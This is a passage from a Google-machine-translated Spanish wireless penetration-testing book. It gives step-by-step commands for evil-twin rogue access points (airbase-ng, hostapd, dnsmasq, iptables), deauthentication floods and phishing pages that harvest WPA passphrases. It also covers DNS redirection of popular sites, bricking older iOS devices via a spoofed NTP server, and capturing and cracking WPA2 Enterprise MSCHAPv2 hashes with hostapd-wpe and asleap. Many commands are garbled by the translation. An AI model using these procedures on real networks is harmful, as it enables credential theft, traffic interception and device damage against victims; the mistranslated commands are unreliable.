base aérea-ng -e "rootsh3ll" -c 1 wlan0mon
[Link] Interfaz táctil creada en 0
[Link] Intentando configurar MTU en 0 a 1500
[Link] Intentando configurar MTU en wlan0mon a 1800
[Link] Punto de acceso con BSSID [Link] iniciado.

De forma predeterminada, airbase-ng crea una interfaz de toque (at0) como una interfaz cableada
virtual para puentear/enrutar el tráfico de red a través del punto de acceso no autorizado. Verifique con ifconfig at0.

at0: flags=4098<TRANSMISIÓN, MULTITRANSMISIÓN> mtu 1500

éter [Link] txqueuelen 1000 (Ethernet)
Paquetes RX 0 bytes 0 (0.0 B)
Errores de RX 0 caídos 0 excesos 0 marco 0
Paquetes TX 0 bytes 0 (0.0 B)
Errores de TX 0 caídas 0 excesos 0 operador 0 colisiones 0

Para que at0 asigne la dirección IP a la víctima, primero debe asignarse un rango de IP.

Asignar IP y máscara de subred

ifconfig at0 [Link] máscara de red [Link]

ruta agregar -net [Link] máscara de red [Link] gw [Link]

116
Machine Translated by Google

Hemos asignado una dirección IP de Clase A a la interfaz at0.

El comando route había configurado [Link] como dirección de red, [Link] como máscara de subred y [Link] como

puerta de enlace predeterminada, es decir , la IP de at0 .

No confunda entre dirección de red y puerta de enlace predeterminada. La dirección de red también se denomina nodo de red. Los
nodos son la dirección IP reservada de cualquier rango específico. "XXX0" y "XXX255" siempre están reservados, por eso el rango de
IP siempre varía de XXX1-254
Una dirección que termina en ".255" también se denomina dirección de transmisión: todos los dispositivos en la misma red deben manejar

paquetes dirigidos a la dirección de difusión.

Usaremos la interfaz Ethernet predeterminada (eth0) después de asignar la dirección IP y la máscara de subred a la interfaz
at0. Esto nos permitirá acceder a Internet dentro de la máquina virtual para enrutar todo el tráfico del cliente a través de ella.

En resumen, permitir que la víctima acceda a Internet y permitirnos a nosotros mismos (atacante) rastrear el tráfico de la
víctima.

Para eso, usaremos la utilidad iptables para establecer una regla de firewall para enrutar todo el tráfico a través de esta

interfaz específica.

Compruebe la dirección IP de la interfaz predeterminada.

Obtendrá un resultado similar, si usa VM

ruta ip
predeterminado a través de [Link]
dev eth0 [Link]/24 dev eth0 proto kernel scope link src [Link]

En este caso, la dirección IP de la interfaz predeterminada es [Link], la suya puede ser diferente

Establecer reglas de Firewall en Iptables

Defina la ruta de tráfico entrante y saliente con iptables:

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

iptables --agregar ADELANTE --en la interfaz at0 -j ACEPTAR
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [Link]:80
iptables -t nat -A POSTROUTING -j MASQUERADE

Asegúrese de ingresar su dirección IP eth0 en el tercer comando después de "--to-destination ".

Descansa si está bien.

No se preocupe, discutiremos en detalle el significado de los comandos anteriores en el próximo capítulo.

Después de ingresar el comando anterior, si está dispuesto a proporcionar acceso a Internet a la víctima, habilite el
enrutamiento ipv4.

Habilitar el reenvío de IP

eco 1 > /proc/sys/net/ipv4/ip_forward

117
Machine Translated by Google

valor de eco:

0: Deshabilitar el reenvío de ipv4

1: Habilitar reenvío ipv4

Las reglas de iptables no son persistentes, aunque las reglas permanecerán definidas hasta el próximo reinicio.

Lo pondremos en 0 para este ataque, ya que no proporcionamos acceso a Internet antes de obtener la contraseña
WPA.

El punto de acceso falso está activo, las herramientas están configuradas y las reglas están habilitadas. Ahora inicie el servidor dhcp para
permitir que el AP falso permita que los clientes se autentiquen.

Primero, debemos decirle al servidor dhcp la ubicación del archivo que creamos anteriormente, que define la clase de IP,
la máscara de subred y el rango de la red.

Iniciar los servicios

Inicie el servidor dhcp, apache y mysql en línea

inicio del servicio isc-dhcp-server

/etc/init.d/apache2 inicio
/etc/init.d/mysql inicio

Tenemos nuestro punto de acceso Wi-Fi falso funcionando perfectamente. Después de la autenticación adecuada, la
víctima verá la página web mientras navega y probablemente ingresará la frase de contraseña que usa para el punto de
acceso inalámbrico.

¡Ataque!
Nuestro ataque ya está listo, solo espere a que el cliente se conecte y vea venir las credenciales.
En la mayoría de los casos, es posible que el cliente ya esté conectado al AP original. Debe desconectar el cliente como
lo hicimos en los capítulos anteriores usando la utilidad aireplay-ng .

Abra el archivo de texto donde guardó la información de AP e ingrese:

Sintaxis: aireplay -ng --deauth 0 -a [BSSID] wlan0mon

aireplay-ng --deauth 0 -a [Link] wlan0mon

[Link] Esperando marco de baliza (BSSID: [Link]) en el canal 1
NB: este ataque es más efectivo cuando se dirige
un cliente inalámbrico conectado (-c <mac del cliente>).
[Link] Envío de DeAuth a transmisión -- BSSID: [Link]
[Link] Envío de DeAuth a transmisión -- BSSID: [Link]
[Link] Envío de DeAuth a transmisión -- BSSID: [Link]
[Link] Envío de DeAuth a transmisión -- BSSID: [Link]
[Link] Envío de DeAuth a transmisión -- BSSID: [Link]
[Link] Envío de DeAuth a transmisión -- BSSID: [Link]

118
Machine Translated by Google

Desglose de comandos:
--muerte 0: Para solicitudes ilimitadas de desautenticación. Limite la solicitud con cualquier número entero +ve
-un: Dirección MAC del enrutador, también conocido como BSSID

Estamos usando 0 para que cada cliente se desconecte de ese BSSID específico y se conecte a nuestro AP,
ya que coincide con el ESSID AP real y es una red de tipo abierto .

Tan pronto como un cliente se conecte a su AP, verá una respuesta de actividad en la ventana de terminal
de airbase-ng como esta:

[Link] Interfaz táctil creada en 0

[Link] Intentando configurar MTU en 0 a 1500
[Link] Intentando configurar MTU en wlan0mon a 1800
[Link] Punto de acceso con BSSID [Link] iniciado.
[Link] Cliente [Link] asociado (sin cifrar) a ESSID: "rootsh3ll"
[Link] Cliente [Link] asociado (sin cifrar) a ESSID: "rootsh3ll"

Para simular el lado del cliente, estoy usando el navegador Firefox que se ejecuta en una máquina
Ubuntu conectada a través de un punto de acceso Wi-Fi falso para ilustrar el ataque.

Cuando la víctima intenta acceder a cualquier sitio web ([Link] en este caso), verá esta página que le
pide a la víctima que ingrese la contraseña WPA2 para descargar y actualizar el firmware.

Aquí estoy ingresando "iamrootsh3ll" como la contraseña que yo (Víctima) creo que es la contraseña
de mi AP.
Tan pronto como la víctima presione [ENTER] , verá esto

119
Machine Translated by Google

Volviendo al lado del atacante. Debe verificar en la base de datos MySQL las contraseñas almacenadas.

Simplemente escriba el comando utilizado anteriormente en la ventana del terminal MySQL y vea si la tabla
está actualizada o no.
Después de simular, verifiqué MySQL DB y aquí está el resultado

mysql> seleccione * de wpa_keys;

+--------------+--------------+
| contraseña1 | contraseña2 |
+--------------+--------------+
| paso de prueba | paso de prueba |
| soyrootsh3ll | soyrootsh3ll |
+--------------+--------------+
2 filas en conjunto (0.00 seg)

¡Voila! usted ha cosechado con éxito la frase de contraseña WPA directamente de la víctima en simple
texto.
Ahora puede cerrar todas las ventanas de la terminal y volver a conectarse al AP real para verificar si
la contraseña es correcta o si la víctima fue en realidad un delincuente fácil y lo engañó. ja ja

No necesita nombrar ningún AP similar a un AP existente, también puede crear un nombre de tipo de Wi-Fi abierto y aleatorio
para reunir al cliente en su AP y comenzar a realizar pruebas.
Esa es una máquina gratis para ti para pruebas de penetración.

Hay muchísimas posibilidades de ataques y técnicas usando puntos de acceso falsos que revelaré en los
próximos capítulos. Hasta entonces sigue probando

120
Machine Translated by Google

Configuración de Rogue AP: una forma más fácil

A veces es doloroso configurar el servidor isc-dhcp. La mayoría de los usuarios no pueden configurar el servidor dhcp o
tienen dificultades para configurarlo. A muchos les resulta difícil realizar tareas flexibles con los puntos de acceso con
airbase-ng, pero terminan frustrados.

airbase-ng es una pequeña herramienta agradable con opciones muy limitadas junto con un servidor isc-dhcp-server
completo, hambriento de memoria y difícil de mantener que en sí mismo no se requiere en niveles operativos mínimos
o especialmente cuando está trabajando en integrado, menor dispositivos potentes como raspberry pi.

hostapd ( daemon de punto de acceso de host ) es un punto de acceso de software muy flexible y liviano capaz de
convertir NIC normales en puntos de acceso completos (reales) y autenticación
servidores.

Hostapd junto con apache puede hacer muchas cosas interesantes, pero algunos de esos aspectos se tratarán en este
libro.

dnsmasq es un servidor DNS de almacenamiento en caché y DHCP ligero.

Dnsmasq acepta consultas DNS y las responde desde un pequeño caché local o las reenvía a un servidor DNS
recursivo real.
Dnsmasq está codificado pensando en pequeños sistemas integrados. Su objetivo es la huella de memoria más pequeña
posible compatible con las funciones admitidas y permite que las funciones innecesarias se omitan del binario compilado.

Antes de saltar directamente a las posibilidades de un AP falso, debe asegurarse de que nuestros archivos de
configuración estén bien configurados.
Esto permitirá que uno esté listo para usar de acuerdo con el escenario y ahorraría mucho tiempo.

Comprender el escenario de ataque básico

Escaneamos el aire y recopilamos información sobre el punto de acceso objetivo.
Información como:

• ESSID: identificador de conjunto de servicios extendidos, también conocido como nombre de AP

• BSSID: Identificador de conjunto de servicios básicos, también conocido como dirección MAC AP

• Número de canal

• Clientes conectados, también conocidos como víctimas

Creamos un punto de acceso con el mismo nombre que nuestro AP de destino (rsX), aunque el canal operativo
puede ser diferente.
Desautentice al cliente del AP real. Espere a que se conecte a nuestro AP falso (rsX)
En el momento en que la víctima se asocia con nuestro AP falso, se le asigna una dirección IP.

Ahora tenemos acceso de nivel de IP a la máquina víctima.

121
Machine Translated by Google

Aquí puedes hacer muchas cosas como:

• Exploración de puertos de la/s máquina/s

• Configure un portal cautivo y pwn a la víctima

• Rastrear el tráfico de Internet de la víctima

• Explotar en la máquina
• Robar credenciales

• Post explotación, que es una dimensión completamente nueva en sí misma

Pero para que todo esto sea posible, debe estar preparado con sus herramientas. como se dice
“Un artesano es tan bueno como sus herramientas”

Ajuste de configuración

Hostapd

Para crear un tipo específico de punto de acceso, ya sea WPA/2 personal, empresarial o karma attack.

Guarda todo lo comentado en tu arsenal, para usarlo más adelante.

Dnsmasq

Servidor ligero DNS/DHCP. Se utiliza para resolver solicitudes de dns desde/hacia una máquina y también actúa como servidor
DHCP para asignar direcciones IP a los clientes.

¿Recuerda la conectividad de nivel de IP con el cliente? gracias a dnsmasq

apache

Básicamente, actúa como un servidor web para el cliente (víctima). Pero puede trascender las capacidades de su servidor
web y AP falso utilizando esta poderosa herramienta, apache.

Aunque no es necesario tener apache y/o mysql en cualquier ataque.

mysql
Toda la información del cliente se almacena en la base de datos. Por lo tanto, es mejor que tenga una base de datos

correspondiente, tablas, columnas preconfiguradas.

Se requieren hostapd y dnsmasq en cualquier caso en el que desee configurar una aplicación falsa. Aunque hay algunas

técnicas avanzadas que pueden diferir según el escenario de ataque.

Técnicas avanzadas que pueden usar flexibilidades y características de apache y mysql

Ejemplo:

Supongamos que forzó la conexión de la víctima a su AP y simplemente quiere olfatear o redirigir el tráfico.

No necesitas apache en absoluto.

Pero en caso de que desee responder a las solicitudes basadas en la web realizadas por la víctima, puede manipularlas
de cierta manera para obtener la máxima información confidencial.

¿Un poco perdido? No se preocupe, los próximos capítulos lo aclararán.

122
Machine Translated by Google

Aprenderemos sobre diferentes escenarios de ataque y la variedad de roles de apache y mysql en él.
Pero antes de eso, configuremos las herramientas fundamentalmente requeridas, es decir , hostapd, dnsmasq

Instalación:
Asegúrese de que esté instalada la última versión de las herramientas:

actualización adecuada

apt instalar hostapd dnsmasq apache2 mysql

Configurar hostapd
Cree un directorio para los archivos de configuración guardados. Abra la Terminal y cree el archivo de configuración
hostapd.

vi [Link]

interface=<Tu interfaz AP falsa>

controlador = nl80211
ssid=< Nombre AP>
modo_hw=g
channel=<Canal operativo #>
macaddr_acl = 0
auth_algs=1
ignore_broadcast_ssid=0

Asegúrese de editar los cambios en consecuencia cada vez que realice un ataque.

El número de canal operativo puede causar problemas si no se elige correctamente.

Configurar dnsmasq
vi [Link]
interface=<Nombre de interfaz AP falso>
dhcp-rango=[Link],[Link],[Link],12h
opción-dhcp=3,[Link]
opción-dhcp=6,[Link]
servidor=[Link]
consultas de registro
log-dhcp
escucha-dirección=[Link]

Asegúrese de definir la interfaz adecuada en el archivo [Link].

Desglose de parámetros:
dhcp-rango=[Link],[Link],12h: La dirección IP del cliente variará de [Link] a [Link], la máscara
de subred de red es [Link] y la concesión predeterminada
el tiempo es de 12 horas.

opción-dhcp=3,[Link]: 3 es el código para la puerta de enlace predeterminada seguido de la IP de DG, es decir

[Link]

opción-dhcp=6,[Link]: 6 para el servidor DNS seguido de la dirección IP

123
Machine Translated by Google

Eso es todo para la configuración. Sencillo, ¿no?

Suponiendo que ya configuró la base de datos mysql y los archivos web requeridos en el directorio de
trabajo de apache, como se enseñó en el segmento anterior de este capítulo, ejecutemos el servidor y nuestro
AP falso ahora

Abra una nueva Terminal y ejecute hostapd:

cd ~ / Escritorio / fakeap /
hostapd [Link]

Para asignar direcciones IP a las víctimas, ejecute dnsmasq.

Antes de eso, configure la dirección IP para la interfaz wlan0 para habilitar la red IP, de modo que dnsmasq pueda
procesar las solicitudes entrantes y dirigir el tráfico en consecuencia.

Abra una nueva Terminal para dnsmasq:

cd ~ / Escritorio / fakeap /
ifconfig wlan0 [Link] dnsmasq #establecer la dirección IP de clase A en wlan0
-C [Link] -d # -C: archivo de configuración. -d: modo daemon (como un proceso)

tan pronto como la víctima se conecte, debería ver un resultado similar para las ventanas de terminal hostapd y
dnsmasq:

hostapd:
Usando la interfaz wlan0 con hwaddr [Link] y ssid "rootsh3ll"
wlan0: estado de la interfaz NO INICIALIZADO->HABILITADO
wlan0: AP-HABILITADO
wlan0: STA [Link] IEEE 802.11: autenticado
wlan0: STA [Link] IEEE 802.11: asociado (ayuda 1)
wlan0: AP-STA-CONECTADO [Link]
wlan0: STA [Link] RADIUS: iniciando la sesión de contabilidad 596B9DE2-00000000

dnsmasq:
dnsmasq: iniciado, versión 2.76 tamaño de caché 150
dnsmasq: opciones de tiempo de compilación: IPv6 GNU-getopt DBus i18n IDN DHCP DHCPv6 no-Lua TFTP conntrack
ipset auth DNSSEC loop-detect inotify
dnsmasq-dhcp: DHCP, intervalo de IP [Link] -- [Link], tiempo de concesión 12 h
dnsmasq: usando el servidor de nombres [Link]#53
dnsmasq: leyendo /etc/[Link]
dnsmasq: usando el servidor de nombres [Link]#53
dnsmasq: usando el servidor de nombres [Link]#53
dnsmasq: leer /etc/hosts - 5 direcciones
dnsmasq-dhcp: 1673205542 rango DHCP disponible: [Link] -- [Link]
dnsmasq-dhcp: 1673205542 el cliente proporciona el nombre: rootsh3ll-iPhone
dnsmasq-dhcp: 1673205542 DHCPDISCOVER(wlan0) [Link] dnsmasq-dhcp:
1673205542 etiquetas: wlan0
dnsmasq-dhcp: 1673205542 DHCPOFFER(wlan0) [Link] [Link] dnsmasq-dhcp:
1673205542 opciones solicitadas: 1:netmask, 121:classless-static-route, 3:router, <-- ---------------------------------------
RECORTE---------- ------------------------------->

dnsmasq-dhcp: 1673205542 rango DHCP disponible: [Link] -- [Link]

124
Machine Translated by Google

Ahora puede habilitar NAT configurando reglas de Firewall en iptables

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

iptables --agregar ADELANTE --en la interfaz wlan0 -j ACEPTAR

y habilitar el acceso a Internet para las víctimas:

eco 1 > /proc/sys/net/ipv4/ip_forward

Aquí hay un poco de cobertura extra...

¿Escuchó sobre el error de 1970 de iOS al falsificar el servidor NTP (protocolo de tiempo de red), donde si configura una fecha

de iOS < 10.1.1 al 01/01/1970, bloqueará su dispositivo permanentemente sin posibilidad de reparación? Sí,

eso es tan fácil como cambiar esta opción al código del servidor NTP:

# Servidor NTP
opción-dhcp=42,[Link]

42 le dice a dnsmasq que redirija todas las solicitudes NTP para sincronización de tiempo a [Link], es decir, cualquier
interfaz de nuestra máquina.

Aquí hay una configuración para NetBIOS, tenga en cuenta que no la necesitamos en nuestra configuración actual

#44-47 NetBIOS

opción-dhcp=44,[Link]
opción-dhcp=45,[Link]
opción-dhcp=46,8
opción-dhcp=47

servidor=[Link]: Opcional para el servidor DNS público, donde [Link] es el DNS de Google

Consultas de Habilitar el registro de consultas

registro : Log- Habilitar el registro de DHCP

dhcp: listen-address=[Link]: Dnsmasq escuchará en localhost el tráfico local/redireccionado. Para que Internet también funcione en nuestra máquina, si

es necesario

Configuraciones opcionales
Puede crear un archivo [Link] opcional para dnsmasq para permitirle redirigir el tráfico de un sitio web de destino a

la dirección IP deseada. Simplemente le dirá al cliente que [Link]

Está alojado en nuestra dirección IP de destino.

vi [Link]
[Link] [Link]
[Link] [Link]
[Link] [Link]
[Link] [Link]
[Link] [Link]

Eso es todo. Simplemente pase el archivo con el indicador -H a dnsmasq y todo su tráfico para estos sitios se

125
Machine Translated by Google

redirigir a su servidor apache .

También puede usar varias direcciones IP (1 IP/dominio) para redirigir el tráfico a otra máquina, ya sea una IP
pública o privada, por ejemplo:

[Link] [Link]
[Link] [Link]
[Link] [Link]
[Link] [Link]
[Link] [Link]

Falsificará las solicitudes de tráfico en consecuencia.

Si se conecta con frecuencia a su punto de acceso móvil y también desea conectar las máquinas cercanas, debe
tener lista la configuración de wpa_supplicant .
Después de matar al administrador de red, aún puede conectarse a Wi-Fi AP usando la utilidad wpa_supplicant .

Guarde el PSK en un archivo:

Sintaxis: wpa_passphrase [ESSID] [Frase de contraseña] > [Link]

wpa_contraseña rooth3ll iamrootsh3ll > [Link]

Creará un archivo, [Link], con contenido:

red={
ssid="rootsh3ll"
#psk="iamrootsh3ll"
psk=1f4b02fe4c82f4e0262e6097e7bad1f19283b6687f084f73331db86c62498b40
}

Puede conectarse a WiFi usando su interfaz WiFi/Estación

sudo wpa_supplicant -D nl80211 -i wlan0 -c [Link]

Esa es toda la configuración que necesita conservar para ahorrar tiempo y esfuerzo. ¿Cómo usarlos con la
configuración de AP falso? Lo descubriremos en el próximo capítulo.
Profundicemos en la mecánica de un AP falso

126
Machine Translated by Google

7
Punto de acceso no autorizado:

Una inmersión más profunda

Hackear la empresa WPA2

En el capítulo anterior, configuramos hostapd para hacerse pasar por un punto de acceso de tipo personal WPA/
WPA2.

Pero esa no es una historia habitual en un entorno corporativo. ¿Por qué? Empresa WPA2

WPA2 Enterprise (no Personal) brinda la seguridad necesaria para redes inalámbricas en entornos comerciales
donde se implementa un servidor RADIUS.

El servicio de usuario de acceso telefónico de autenticación remota (RADIUS) es un protocolo y

software de cliente/servidor que permite que los servidores de acceso remoto se comuniquen con un servidor

central para autenticar a los usuarios de acceso telefónico y autorizar su acceso al sistema o servicio solicitado.
RADIUS permite que una empresa mantenga perfiles de usuario en una base de datos central que todos los
servidores remotos pueden compartir. Proporciona una mejor seguridad, lo que permite a una empresa configurar una
política que se puede aplicar en un único punto de red administrado.

127
Machine Translated by Google

Introducción

¿Diferencia entre WPA2 - Personal y Enterprise?

Las variantes PSK de WPA y WPA2 utilizan una clave de 256 bits derivada de una contraseña para la
autenticación.

Las variantes Enterprise de WPA y WPA2, también conocidas como 802.1x, utilizan un servidor RADIUS para fines
de autenticación. La autenticación se logra utilizando variantes del EAP protocolo. Esta es una configuración más
compleja pero más segura.
La diferencia clave entre WPA y WPA2 es el protocolo de cifrado utilizado. WPA utiliza el
TKIP mientras que WPA2 introduce soporte para CCMP protocolo.

De forma predeterminada, hostapd no admite el ataque de suplantación de identidad WPA/2 Enterprise. Aquí viene
hostapd-wpe (Wireless Pwnage Edition), un parche para hostapd para facilitar los ataques de suplantación de puntos
de acceso.

hostapd-wpe es el reemplazo de FreeRADIUS-WPE ( http://

[Link]/?page_id=37 )

Implementa ataques de suplantación de identidad del servidor de autenticación y del autenticador IEEE 802.1x para
obtener las credenciales del cliente, establecer la conectividad con el cliente y lanzar otros ataques cuando
corresponda.
hostapd-wpe admite los siguientes tipos de EAP para la suplantación:
1. EAP-FAST/MSCHAPv2 (Fase 0)
2. PEAP/MSCHAPv2
3. EAP-TTLS/MSCHAPv2
4. EAP-TTLS/MSCHAP
5. EAP-TTLS/CHAP
6. EAP-TTLS/PAP

Una vez que la suplantación esté en marcha, hostapd-wpe devolverá un mensaje EAP-Success para que el cliente
crea que está conectado a su autenticador legítimo.
Es necesario que hostapd ya esté instalado para aplicar el parche hostapd-wpe, por supuesto.

Instalación:
actualización adecuada

sudo apt install libnl-genl-3-dev libssl-dev

apt instalar hostapd hostapd-wpe

Enumere el contenido de /etc/ hostapd-wpe/. Verá un archivo de configuración ([Link]) y una carpeta
llamada certs. Que contiene certificados implementados.

ls -l /etc/hostapd-wpe/

128
Machine Translated by Google

total 96
drwxr-xr-x 3 raíz raíz 4096 4 de abril 03:15 certs -rw-r--r-- 1 raíz raíz
83968 12 de noviembre 15:40 [Link] -rw-r--r-- 1 raíz raíz 4573 12 de
noviembre 15:40 hostapd-wpe.eap_user

Ahora, puede editar el archivo [Link] para realizar cambios según sus necesidades. Simplemente
cambiaré el SSID, por el bien de la prueba.

vi /etc/hostapd-wpe/[Link]

SSID antiguo: hostapd-wpe

Nuevo SSID: rsX

Eso es todo. Simplemente ejecute hostapd-wpe y comience a recopilar credenciales cifradas.

airmon-ng comprobar matar

Matar estos procesos:

Nombre de PID

2765 wpa_supplicant 2766

dhclient
2785 avahi-demonio-ch

hostapd-wpe /etc/hostapd-wpe/[Link]

Archivo de configuración: /etc/hostapd-wpe/[Link] Uso de la

interfaz wlan0 con hwaddr [Link] y ssid "rsX" wlan0: estado de la interfaz SIN
INICIALIZAR->HABILITADO
wlan0: AP-HABILITADO
wlan0: STA [Link] IEEE 802.11: autenticado
wlan0: STA [Link] IEEE 802.11: asociado (ayuda 1) wlan0: CTRL-EVENT-
EAP-STARTED [Link]

wlan0: CTRL-EVENTO-EAP-MÉTODO PROPUESTO proveedor=0 método=1

wlan0: CTRL-EVENTO-EAP-MÉTODO PROPUESTO proveedor=0 método=25

Estoy simulando el escenario con un cliente iOS como

víctima con credenciales:

Nombre de usuario: testuser

Clave: pase de prueba

La primera víctima tendría que ingresar el nombre de usuario y

clave:

129
Machine Translated by Google

Después de que la víctima haga clic en "Unirse", tendrá que confiar en el certificado proporcionado por hostapd-wpe.

Tan pronto como la víctima confíe en el certificado, obtendrá algo similar en la pantalla hostapd-wpe:

mschapv2: martes 4 de abril [Link] 2017

nombre de usuario: ensayador

desafío: [Link]
respuesta: [Link]
jtr NETNTLM:
usuario de prueba: $NETNTLM$c8442f7b85620440$685adf105780a337b9a00e8bb379283ea34053d73f02f842
wlan0: STA [Link] IEEE 802.11: desasociado
wlan0: STA [Link] IEEE 802.11: desautenticado debido a inactividad (temporizador DEAUTH/REMOVE)

^Cwlan0: estado de la interfaz HABILITADO->DESHABILITADO

wlan0: AP-DESHABILITADO
nl80211: definir ifname=wlan0 disabled_11b_rates=0

Presiona Ctrl-C para detener el ataque y pasar al siguiente paso, fuerza bruta.

Para la demostración, estoy usando la lista de palabras rockyou preinstalada en Kali Linux.
Copie toda la información requerida, es decir

1. Texto del desafío

2. Respuesta
3. Lista de palabras

4. Herramientas para usarlas todas para crackear

Rompe el hachís
zcat /usr/share/wordlists/[Link] | dormido -C c8 :44:2f:7b:85:62:04:40 -R
[Link] -W -

Desglose de comandos:
zcat: Extrae el contenido comprimido de la lista de palabras [Link] en STDIN.
'|': El operador de tubería pasa la salida de zcat como entrada estándar a asleap (- W -)
dormido: toma el desafío (-C) y la respuesta (-R) junto con la lista de palabras (-W) que se pasa como entrada estándar
(nota '-' después de -W).

Verá un resultado similar si la contraseña está en la lista de palabras:

130
Machine Translated by Google

asleap 2.2: recupera activamente las contraseñas de LEAP/PPTP. <jwright@[Link]> Uso

de STDIN para palabras. bytes hash: hash NT 619b:

35ccba9168b1d5ca6093b4b7d56c619b
clave: pase de prueba

¡Felicidades! Finalmente descifraste la contraseña WPA2 Enterprise.

También puede utilizar otras listas de palabras. En Kali, se encuentran en /usr/ share/ wordlists/

ls /usr/share/wordlists/ -lh
total 51M
lrwxrwxrwx 1 root root 25 Nov 20 03:44 dirb -> /usr/share/dirb/wordlists lrwxrwxrwx 1 root root
30 Nov 20 03:44 dirbuster -> /usr/share/dirbuster/wordlists lrwxrwxrwx 1 root root 35 Nov 20 03:44 [Link]
-> /usr/share/dnsmap/wordlist_TLAs.txt lrwxrwxrwx 1 raíz raíz 41 20 de noviembre 03:44 [Link] -> /usr/share/
set/src/fasttrack/[Link] lrwxrwxrwx 1 root root 45 20 de noviembre 03:44 fern-wifi -> /usr/share/fern-wifi-cracker/extras/
wordlists lrwxrwxrwx 1 root root 46 20 de noviembre 03:44 metasploit -> /usr/share/metasploit-framework/data /wordlists
lrwxrwxrwx 1 raíz raíz 41 20 de noviembre 03:44 [Link] -> /usr/share/nmap/nselib/data/[Link] -rw-r--r-- 1 raíz raíz 51M 3
de marzo de 2013 [Link] .gz lrwxrwxrwx 1 raíz raíz 34 20 de noviembre 03:44 [Link] -> /usr/share/sqlmap/txt/[Link]
lrwxrwxrwx 1 raíz raíz 25 de noviembre 20 03:44 wfuzz -> /usr/share/wfuzz/wordlist

Consulte el menú de ayuda de hostapd-wpe para descubrir nuevas posibilidades, simplemente ejecute

hostapd-wpe

hostapd-WPE v2.6
Daemon de espacio de usuario para gestión de AP IEEE
802.11, autenticador IEEE 802.1X/WPA/WPA2/EAP/RADIUS
Copyright (c) 2002-2016, Jouni Malinen <j@[Link]> y colaboradores
-------------------------------------------------- ---

Thomas d'Otreppe <@aircrackng> uso:

hostapd-wpe [-hdBKtvskc] [-P <archivo PID>] [-e <archivo de entropía>] \ [-g <global
ctrl_iface>] [-G <grupo>]\ [-i <lista de nombres de interfaz separados por comas>]\
<archivo(s) de configuración> opciones: -h mostrar este uso -d mostrar más
mensajes de depuración (-dd para aún más)

-B ejecutar daemon en segundo plano -e

archivo de entropía -g ruta de interfaz de
control global
-G grupo para interfaces de control
-P archivo PID
-K incluir datos clave en los mensajes de depuración
-i lista de nombres de interfaz a usar
-S iniciar todas las interfaces sincrónicamente -t incluir
marcas de tiempo en algunos mensajes de depuración -v
mostrar la versión de hostapd
Opciones de WPE ------------------- (registro
de credenciales siempre habilitado)
-s Devolver el éxito siempre que sea posible
-k Modo Karma (Responder a todas las sondas) -c
Modo Cupido (clientes Heartbleed)

131
Machine Translated by Google

Virtualización de interfaz: 1 tarjeta AP falsa

Introducción
No es difícil suponer que durante las pruebas de penetración inalámbricas, las personas terminan teniendo solo una
NIC de Wi-Fi y, a veces, tienen dificultades para acceder a la red inalámbrica de destino, gracias a WPA2.

Una alternativa, como vimos anteriormente, es llevar a la víctima a su punto de acceso falso
desautenticándolo del original.
Pero, eso es un mundo completamente nuevo en sí mismo. Un montón de situaciones que debes abordar y descubres
que las herramientas no están diseñadas para luchar contra todas ellas. Por lo tanto, es esencial para usted, un probador
de penetración, comprender la mecánica y tener en sus manos las herramientas directamente y arreglarlas según lo
exija el escenario.

Un problema principal con el punto de acceso falso es proporcionar acceso a Internet. Es fundamental prever
para que la víctima no sospeche, desconecte y pierda a su presa.

Anteriormente, aprendimos a brindar acceso a Internet a la víctima cuando nosotros mismos estamos conectados
a través de Ethernet directamente o Wi-Fi en el host (ethX en VM). En ambos casos, o estamos atascados con un cable
físico o necesitamos otra tarjeta Wi-Fi para realizar tareas como:
1. Conexión a un punto de acceso
2. Desautenticación, o
3. Unir las interfaces

Ambos casos no resuelven nuestro problema de ser remotos, atascados con una sola NIC, también conocido
como modo de supervivencia. Pero necesitamos desesperadamente piratear la computadora de la víctima/
teléfono inteligente / tableta, lo que sea.

Entonces, ¿cómo podemos hacer esto?

Engañando a su kernel de Linux para que cree interfaces de software con una tarjeta inalámbrica física y utilícelas como
una entidad separada con algunas limitaciones o, en términos simples, creando interfaces virtuales.

¿Qué es una interfaz virtual (vif)?

Cuenta a [Link],

“El subsistema nl80211 en el kernel de Linux admite la creación de múltiples interfaces inalámbricas con una
tarjeta inalámbrica física. Esto depende del controlador que implemente esto. Esto podría permitirle unirse a varias
redes a la vez o conectarse a una red mientras enruta el tráfico desde una interfaz de punto de acceso”.

132
Machine Translated by Google

MENTE = *SOPLADO*

¿Cómo hacerlo? ¡Usted pregunta!

Usando la utilidad iw , incluida en casi todas las distribuciones de Linux. Pero aquí está la cosa,
No todas las tarjetas admiten la virtualización de interfaz. Ni siquiera mi Alfa AWUS036NH lo soporta por completo.
Pero una TP-LINK TL-WN722N (tarjeta Atheros) más económica sí lo admitió por completo.

También puede ver si su tarjeta actual lo admite o no.

1. Conecta tu tarjeta a Kali
2. Ejecute la lista iw en la Terminal

3. Desea ver AP/VLAN en la salida en los modos de interfaz de software, así:

Modos de interfaz de software (siempre se pueden agregar):

* Punto de acceso/VLAN

* vigilar

Una cadena similar en la salida de su lista iw significa que puede crear interfaces virtuales con esa tarjeta.
Pero eso no es suficiente,
también debe verificar las posibles combinaciones de interfaz con la tarjeta. Consulte el resultado de la lista iw en la
sección de combinaciones de interfaz válidas :

combinaciones de interfaz válidas:

* #{ administrado, cliente P2P } <= 2, #{ AP, punto de malla, P2P-GO } <= 2,
total <= 2, #canales <= 1

Desglose de salida:
#{administrado, cliente P2P} <= 2 : Como máximo 2 interfaces gestionadas (modo cliente) posibles
#{ AP, punto de malla, P2P-GO } <= 2 : se pueden crear un máximo de 2 Aps simultáneamente
totales <= 2: Como dice, se pueden usar un máximo de dos interfaces activas

#canales <= 1: Este es complicado, déjame explicarte. Un Wi-Fi es, en última instancia, una radio.
Una radio puede funcionar en un canal o frecuencia fijos (por ejemplo, 2437 MHz)
en un momento determinado. Por lo tanto, los canales son <= 1 significa que no es
posible usar la tarjeta en más de un canal/frecuencia
en cualquier momento dado.

¿Por que importa?

Como desea conectarse a un punto de acceso para la conectividad a Internet y luego, lo más probable es que cree un AP
falso en el mismo hardware. No es posible conectarse a un punto de acceso (por ejemplo, en el canal 6) y crear un AP en
el canal 11.

¿Como arreglarlo?

1. Verifique el canal en el que se está operando su punto de acceso.

2. Cree su AP falso en el mismo canal.

Ahora que ha verificado que su tarjeta es compatible con la virtualización de interfaz. Vamos a llegar

133
